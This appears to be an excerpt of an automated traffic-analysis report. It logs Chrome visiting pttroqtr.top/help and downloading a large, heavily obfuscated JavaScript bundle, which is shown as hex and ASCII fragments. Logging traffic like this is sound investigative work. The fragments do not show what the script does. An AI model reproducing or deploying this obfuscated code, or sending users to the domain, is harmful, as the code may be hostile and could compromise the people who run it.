                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Sep 28, 2024 05:39:19.648962975 CEST369INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:19 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 169
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Location: https://pttroqtr.top/help
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.24.0</center></body></html>
                                                                                                                                                                                            Sep 28, 2024 05:40:04.650243998 CEST6OUTData Raw: 00
                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            1192.168.2.5497108.211.203.165802584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Sep 28, 2024 05:40:04.059077978 CEST6OUTData Raw: 00
                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            0192.168.2.5497138.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:21 UTC659OUTGET /help HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:21 UTC236INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:21 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                            Content-Length: 68
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Location: /help/
                                                                                                                                                                                            Vary: Accept
                                                                                                                                                                                            2024-09-28 03:39:21 UTC68INData Raw: 3c 70 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 2f 68 65 6c 70 2f 22 3e 2f 68 65 6c 70 2f 3c 2f 61 3e 3c 2f 70 3e
                                                                                                                                                                                            Data Ascii: <p>Moved Permanently. Redirecting to <a href="/help/">/help/</a></p>


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            1192.168.2.5497158.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:21 UTC660OUTGET /help/ HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:22 UTC347INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:22 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                            Content-Length: 1638
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"666-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:22 UTC1638INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 0a 20 20 20 20 20 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 0a 20 20 20 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 73 72 63 3d 22 2e 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 66 35 34 35 37 37 31 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20
                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" /> <script type="module" crossorigin src="./assets/index-f5457718.js"></script>


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            2192.168.2.549716184.28.90.27443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:22 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                            2024-09-28 03:39:22 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                            Server: ECAcc (lpl/EF67)
                                                                                                                                                                                            X-CID: 11
                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                            X-Ms-Region: prod-neu-z1
                                                                                                                                                                                            Cache-Control: public, max-age=219940
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:22 GMT
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            X-CID: 2


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            3192.168.2.5497188.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:23 UTC557OUTGET /help/assets/f6170fbbkFGym.css HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:23 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:23 GMT
                                                                                                                                                                                            Content-Type: text/css; charset=utf-8
                                                                                                                                                                                            Content-Length: 952
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"3b8-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:23 UTC952INData Raw: 40 6b 65 79 66 72 61 6d 65 73 20 67 2d 6c 6f 61 64 69 6e 67 2d 62 67 41 6e 69 6d 7b 30 25 2c 74 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 36 33 35 29 7d 35 30 25 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 30 29 7d 7d 2e 67 2d 6c 6f 61 64 69 6e 67 2d 6d 61 73 6b 7b 77 69 64 74 68 3a 31 30 30 76 77 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 30 3b 61 6e 69 6d 61 74 69 6f 6e 3a 67 2d 6c 6f 61
                                                                                                                                                                                            Data Ascii: @keyframes g-loading-bgAnim{0%,to{background-color:rgba(255,255,255,.635)}50%{background-color:rgba(255,255,255,0)}}.g-loading-mask{width:100vw;height:100vh;display:flex;justify-content:center;align-items:center;position:fixed;left:0;top:0;animation:g-loa


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            4192.168.2.5497178.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:23 UTC570OUTGET /help/assets/index-f5457718.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:23 UTC364INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:23 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 504521
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:46 GMT
                                                                                                                                                                                            ETag: W/"7b2c9-18fc3d855f0"
                                                                                                                                                                                            2024-09-28 03:39:23 UTC16020INData Raw: 76 61 72 20 61 33 38 5f 30 78 33 62 39 38 37 37 3d 61 33 38 5f 30 78 34 33 35 62 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 35 31 35 31 66 2c 5f 30 78 35 34 39 63 64 62 29 7b 76 61 72 20 5f 30 78 39 65 61 31 62 66 3d 61 33 38 5f 30 78 34 33 35 62 2c 5f 30 78 32 31 38 63 33 62 3d 5f 30 78 34 35 31 35 31 66 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 35 33 61 65 32 32 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 33 62 32 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 33 62 62 29 29 2f 30 78 32 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 34 63 38 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 36
                                                                                                                                                                                            Data Ascii: var a38_0x3b9877=a38_0x435b;(function(_0x45151f,_0x549cdb){var _0x9ea1bf=a38_0x435b,_0x218c3b=_0x45151f();while(!![]){try{var _0x53ae22=-parseInt(_0x9ea1bf(0x3b2))/0x1+parseInt(_0x9ea1bf(0x3bb))/0x2+-parseInt(_0x9ea1bf(0x4c8))/0x3*(-parseInt(_0x9ea1bf(0x6
                                                                                                                                                                                            2024-09-28 03:39:23 UTC16384INData Raw: 31 66 38 3d 3e 50 6e 28 5f 30 78 33 64 32 31 66 38 29 5b 61 33 38 5f 30 78 33 62 39 38 37 37 28 30 78 36 31 62 29 5d 28 30 78 38 2c 2d 30 78 31 29 2c 51 69 3d 5f 30 78 35 64 62 36 62 65 3d 3e 50 6e 28 5f 30 78 35 64 62 36 62 65 29 3d 3d 3d 27 5b 6f 62 6a 65 63 74 5c 78 32 30 4f 62 27 2b 61 33 38 5f 30 78 33 62 39 38 37 37 28 30 78 34 37 30 29 2c 4e 30 3d 5f 30 78 33 35 33 66 63 62 3d 3e 42 65 28 5f 30 78 33 35 33 66 63 62 29 26 26 5f 30 78 33 35 33 66 63 62 21 3d 3d 27 4e 61 4e 27 26 26 5f 30 78 33 35 33 66 63 62 5b 30 78 30 5d 21 3d 3d 27 2d 27 26 26 27 27 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 35 33 66 63 62 2c 30 78 61 29 3d 3d 3d 5f 30 78 33 35 33 66 63 62 2c 54 72 3d 54 30 28 61 33 38 5f 30 78 33 62 39 38 37 37 28 30 78 33 37 34 29 2b 61 33 38 5f
                                                                                                                                                                                            Data Ascii: 1f8=>Pn(_0x3d21f8)[a38_0x3b9877(0x61b)](0x8,-0x1),Qi=_0x5db6be=>Pn(_0x5db6be)==='[object\x20Ob'+a38_0x3b9877(0x470),N0=_0x353fcb=>Be(_0x353fcb)&&_0x353fcb!=='NaN'&&_0x353fcb[0x0]!=='-'&&''+parseInt(_0x353fcb,0xa)===_0x353fcb,Tr=T0(a38_0x3b9877(0x374)+a38_
                                                                                                                                                                                            2024-09-28 03:39:23 UTC16384INData Raw: 55 52 4c 53 65 61 72 63 27 2c 27 70 6f 72 74 65 64 5c 78 32 30 62 79 5c 78 32 30 27 2c 27 3d 5c 78 32 32 33 5c 78 32 32 5c 78 32 30 72 79 3d 5c 78 32 32 36 27 2c 27 5f 62 6c 6f 63 6b 73 27 2c 27 6b 65 79 53 69 7a 65 27 2c 27 41 4c 50 48 41 5f 44 49 47 49 27 2c 27 5f 78 66 6f 72 6d 4d 6f 64 65 27 2c 27 6f 64 69 6e 67 27 2c 27 6f 72 74 65 64 27 2c 27 72 6d 3d 5c 78 32 32 72 6f 74 61 74 65 27 2c 27 67 65 74 53 65 6c 65 63 74 69 27 2c 27 5c 78 32 30 62 65 67 69 6e 3d 5c 78 32 32 2d 30 27 2c 27 53 50 4f 4e 53 45 27 2c 27 73 69 67 42 79 74 65 73 27 2c 27 72 43 68 61 72 27 2c 27 6f 6e 61 6c 5c 78 32 30 6f 70 74 69 6f 27 2c 27 5c 78 32 30 3c 2f 67 3e 3c 67 5c 78 32 30 74 72 27 2c 27 64 61 74 61 5c 78 32 30 6d 75 73 74 5c 78 32 30 27 2c 27 5c 78 35 63 64 2a 27 2c
                                                                                                                                                                                            Data Ascii: URLSearc','ported\x20by\x20','=\x223\x22\x20ry=\x226','_blocks','keySize','ALPHA_DIGI','_xformMode','oding','orted','rm=\x22rotate','getSelecti','\x20begin=\x22-0','SPONSE','sigBytes','rChar','onal\x20optio','\x20</g><g\x20tr','data\x20must\x20','\x5cd*',
                                                                                                                                                                                            2024-09-28 03:39:23 UTC16384INData Raw: 33 33 33 33 33 33 33 33 73 5c 78 32 32 27 2c 27 6d 3d 5c 78 32 32 72 6f 74 61 74 65 28 27 2c 27 53 79 6e 74 61 78 45 72 72 6f 27 2c 27 63 68 61 72 43 6f 64 65 41 74 27 2c 27 5c 78 32 32 72 6f 74 61 74 65 28 30 5c 78 32 30 27 2c 27 68 65 61 64 65 72 73 27 2c 27 74 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 67 27 2c 27 5c 78 32 30 5b 6c 64 69 6f 5d 5c 78 32 30 67 65 27 2c 27 65 6e 63 72 79 70 74 27 2c 27 5f 5f 69 73 54 65 6c 65 70 6f 27 2c 27 72 61 77 49 6e 73 65 72 74 65 27 2c 27 2e 77 33 2e 6f 72 67 2f 32 30 27 2c 27 70 61 64 64 69 6e 67 27 2c 27 5c 78 32 30 6e 6f 6e 2d 69 74 65 72 61 27 2c 27 24 73 74 61 74 65 27 2c 27 70 6f 77 27 2c 27 66 6f 63 75 73 4f 66 66 73 65 27 2c 27 5f 62 69 6e 64 45 76 65 6e 74 27 2c 27 5f 63 72 65 61
                                                                                                                                                                                            Data Ascii: 33333333s\x22','m=\x22rotate(','SyntaxErro','charCodeAt','\x22rotate(0\x20','headers','t>\x0a\x20\x20\x20\x20</g','\x20[ldio]\x20ge','encrypt','__isTelepo','rawInserte','.w3.org/20','padding','\x20non-itera','$state','pow','focusOffse','_bindEvent','_crea
                                                                                                                                                                                            2024-09-28 03:39:23 UTC16384INData Raw: 31 29 3b 63 6f 6e 73 74 20 5f 30 78 34 33 33 33 32 36 3d 24 72 28 5f 30 78 31 32 32 63 36 61 29 3b 6c 65 74 20 5f 30 78 34 65 35 62 37 65 3b 74 72 79 7b 5f 30 78 34 65 35 62 37 65 3d 5f 30 78 37 38 62 33 36 33 28 2e 2e 2e 5f 30 78 63 39 39 30 38 61 29 3b 7d 66 69 6e 61 6c 6c 79 7b 24 72 28 5f 30 78 34 33 33 33 32 36 29 2c 5f 30 78 31 33 36 32 34 38 5b 27 5f 64 27 5d 26 26 6a 73 28 30 78 31 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 34 65 35 62 37 65 3b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 31 33 36 32 34 38 5b 27 5f 6e 27 5d 3d 21 30 78 30 2c 5f 30 78 31 33 36 32 34 38 5b 27 5f 63 27 5d 3d 21 30 78 30 2c 5f 30 78 31 33 36 32 34 38 5b 27 5f 64 27 5d 3d 21 30 78 30 2c 5f 30 78 31 33 36 32 34 38 3b 7d 66 75 6e 63 74 69 6f 6e 20 65 30 28 5f 30 78 35 62 37 32 39 64
                                                                                                                                                                                            Data Ascii: 1);const _0x433326=$r(_0x122c6a);let _0x4e5b7e;try{_0x4e5b7e=_0x78b363(..._0xc9908a);}finally{$r(_0x433326),_0x136248['_d']&&js(0x1);}return _0x4e5b7e;};return _0x136248['_n']=!0x0,_0x136248['_c']=!0x0,_0x136248['_d']=!0x0,_0x136248;}function e0(_0x5b729d
                                                                                                                                                                                            2024-09-28 03:39:23 UTC16384INData Raw: 69 6e 64 27 5d 28 5f 30 78 34 62 35 34 66 62 5b 61 33 38 5f 30 78 33 62 39 38 37 37 28 30 78 36 61 35 29 5d 29 29 2c 27 24 77 61 74 63 68 27 3a 5f 30 78 34 32 63 32 32 35 3d 3e 65 6c 5b 61 33 38 5f 30 78 33 62 39 38 37 37 28 30 78 34 37 61 29 5d 28 5f 30 78 34 32 63 32 32 35 29 7d 29 2c 74 30 3d 28 5f 30 78 31 35 66 63 33 36 2c 5f 30 78 35 61 62 64 37 31 29 3d 3e 5f 30 78 31 35 66 63 33 36 21 3d 3d 45 65 26 26 21 5f 30 78 31 35 66 63 33 36 5b 27 5f 5f 69 73 53 63 72 69 70 74 27 2b 27 53 65 74 75 70 27 5d 26 26 64 65 28 5f 30 78 31 35 66 63 33 36 2c 5f 30 78 35 61 62 64 37 31 29 2c 70 6c 3d 7b 27 67 65 74 27 28 7b 5f 3a 5f 30 78 34 31 37 38 38 66 7d 2c 5f 30 78 33 66 31 64 63 35 29 7b 76 61 72 20 5f 30 78 35 61 63 64 66 65 3d 61 33 38 5f 30 78 33 62 39 38
                                                                                                                                                                                            Data Ascii: ind'](_0x4b54fb[a38_0x3b9877(0x6a5)])),'$watch':_0x42c225=>el[a38_0x3b9877(0x47a)](_0x42c225)}),t0=(_0x15fc36,_0x5abd71)=>_0x15fc36!==Ee&&!_0x15fc36['__isScript'+'Setup']&&de(_0x15fc36,_0x5abd71),pl={'get'({_:_0x41788f},_0x3f1dc5){var _0x5acdfe=a38_0x3b98
                                                                                                                                                                                            2024-09-28 03:39:23 UTC16384INData Raw: 5f 30 78 33 62 39 38 37 37 28 30 78 31 65 63 29 2c 5a 30 3d 5f 30 78 31 65 32 39 63 37 3d 3e 72 65 28 5f 30 78 31 65 32 39 63 37 29 3f 5f 30 78 31 65 32 39 63 37 5b 61 33 38 5f 30 78 33 62 39 38 37 37 28 30 78 31 34 31 29 5d 28 65 74 29 3a 5b 65 74 28 5f 30 78 31 65 32 39 63 37 29 5d 2c 41 6c 3d 28 5f 30 78 35 37 37 33 61 37 2c 5f 30 78 31 38 33 63 64 65 2c 5f 30 78 62 61 66 62 35 33 29 3d 3e 7b 69 66 28 5f 30 78 31 38 33 63 64 65 5b 27 5f 6e 27 5d 29 72 65 74 75 72 6e 20 5f 30 78 31 38 33 63 64 65 3b 63 6f 6e 73 74 20 5f 30 78 33 61 66 38 33 64 3d 57 75 28 28 2e 2e 2e 5f 30 78 33 64 31 36 62 66 29 3d 3e 5a 30 28 5f 30 78 31 38 33 63 64 65 28 2e 2e 2e 5f 30 78 33 64 31 36 62 66 29 29 2c 5f 30 78 62 61 66 62 35 33 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 61
                                                                                                                                                                                            Data Ascii: _0x3b9877(0x1ec),Z0=_0x1e29c7=>re(_0x1e29c7)?_0x1e29c7[a38_0x3b9877(0x141)](et):[et(_0x1e29c7)],Al=(_0x5773a7,_0x183cde,_0xbafb53)=>{if(_0x183cde['_n'])return _0x183cde;const _0x3af83d=Wu((..._0x3d16bf)=>Z0(_0x183cde(..._0x3d16bf)),_0xbafb53);return _0x3a
                                                                                                                                                                                            2024-09-28 03:39:23 UTC16384INData Raw: 78 35 35 30 66 62 30 2c 5f 30 78 32 36 34 31 63 38 2c 5f 30 78 34 66 37 34 31 35 2c 5f 30 78 33 66 33 36 37 39 29 2c 28 5f 30 78 31 30 65 37 36 38 5b 5f 30 78 33 39 35 39 38 35 28 30 78 34 65 34 29 5d 21 3d 6e 75 6c 6c 7c 7c 5f 30 78 35 35 30 66 62 30 26 26 5f 30 78 31 30 65 37 36 38 3d 3d 3d 5f 30 78 35 35 30 66 62 30 5b 5f 30 78 33 39 35 39 38 35 28 30 78 33 34 35 29 5d 29 26 26 51 30 28 5f 30 78 32 30 66 38 61 37 2c 5f 30 78 31 30 65 37 36 38 2c 21 30 78 30 29 29 3a 5f 30 78 35 33 34 31 64 34 28 5f 30 78 32 30 66 38 61 37 2c 5f 30 78 31 30 65 37 36 38 2c 5f 30 78 32 63 39 32 38 31 2c 5f 30 78 31 66 36 63 65 63 2c 5f 30 78 35 35 30 66 62 30 2c 5f 30 78 32 36 34 31 63 38 2c 5f 30 78 34 66 37 34 31 35 2c 5f 30 78 33 66 33 36 37 39 2c 5f 30 78 33 63 37 63
                                                                                                                                                                                            Data Ascii: x550fb0,_0x2641c8,_0x4f7415,_0x3f3679),(_0x10e768[_0x395985(0x4e4)]!=null||_0x550fb0&&_0x10e768===_0x550fb0[_0x395985(0x345)])&&Q0(_0x20f8a7,_0x10e768,!0x0)):_0x5341d4(_0x20f8a7,_0x10e768,_0x2c9281,_0x1f6cec,_0x550fb0,_0x2641c8,_0x4f7415,_0x3f3679,_0x3c7c
                                                                                                                                                                                            2024-09-28 03:39:23 UTC16384INData Raw: 65 3b 7d 66 6f 72 28 5f 30 78 33 37 36 32 61 30 3d 30 78 30 2c 5f 30 78 34 33 63 38 61 37 3d 5f 30 78 35 31 34 32 65 33 5b 5f 30 78 35 63 34 37 64 61 28 30 78 33 63 36 29 5d 2d 30 78 31 3b 5f 30 78 33 37 36 32 61 30 3c 5f 30 78 34 33 63 38 61 37 3b 29 5f 30 78 31 61 38 31 63 62 3d 5f 30 78 33 37 36 32 61 30 2b 5f 30 78 34 33 63 38 61 37 3e 3e 30 78 31 2c 5f 30 78 37 64 32 33 35 62 5b 5f 30 78 35 31 34 32 65 33 5b 5f 30 78 31 61 38 31 63 62 5d 5d 3c 5f 30 78 32 64 31 36 31 32 3f 5f 30 78 33 37 36 32 61 30 3d 5f 30 78 31 61 38 31 63 62 2b 30 78 31 3a 5f 30 78 34 33 63 38 61 37 3d 5f 30 78 31 61 38 31 63 62 3b 5f 30 78 32 64 31 36 31 32 3c 5f 30 78 37 64 32 33 35 62 5b 5f 30 78 35 31 34 32 65 33 5b 5f 30 78 33 37 36 32 61 30 5d 5d 26 26 28 5f 30 78 33 37 36
                                                                                                                                                                                            Data Ascii: e;}for(_0x3762a0=0x0,_0x43c8a7=_0x5142e3[_0x5c47da(0x3c6)]-0x1;_0x3762a0<_0x43c8a7;)_0x1a81cb=_0x3762a0+_0x43c8a7>>0x1,_0x7d235b[_0x5142e3[_0x1a81cb]]<_0x2d1612?_0x3762a0=_0x1a81cb+0x1:_0x43c8a7=_0x1a81cb;_0x2d1612<_0x7d235b[_0x5142e3[_0x3762a0]]&&(_0x376
